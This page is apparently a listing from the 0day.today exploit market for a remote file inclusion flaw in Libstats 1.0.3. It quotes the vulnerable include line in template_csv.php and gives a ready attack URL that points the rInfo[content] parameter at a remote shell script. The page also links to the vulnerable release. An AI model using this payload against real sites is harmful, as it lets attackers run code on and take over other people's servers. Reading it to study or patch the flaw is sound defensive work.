[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Libstats <= 1.0.3 (template_csv.php) Remote File Inclusion Vulnerability

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1888
Category
web applications
Date add
17-05-2007
Platform
unsorted
========================================================================
Libstats <= 1.0.3 (template_csv.php) Remote File Inclusion Vulnerability
========================================================================



#Libstats 1.0.3 <=  Remote File Inclusion Vulnerability
#
#Vuln Code
##############################################################################################
#
#ERROR1:template_csv.php
#
#include $rInfo['content'];   <<< RFI CODE
#
#
#BUG1:
#
#Example1:http://site.com/path/template_csv.php?rInfo[content]=[[Sh3LL Script]]
#
#Script Download
##############################################################################################
#
#http://www.wendt.wisc.edu/projects/systems/libstats/releases/libstats-1.0.3.zip
#
##############################################################################################



#  0day.today [2024-12-25]  #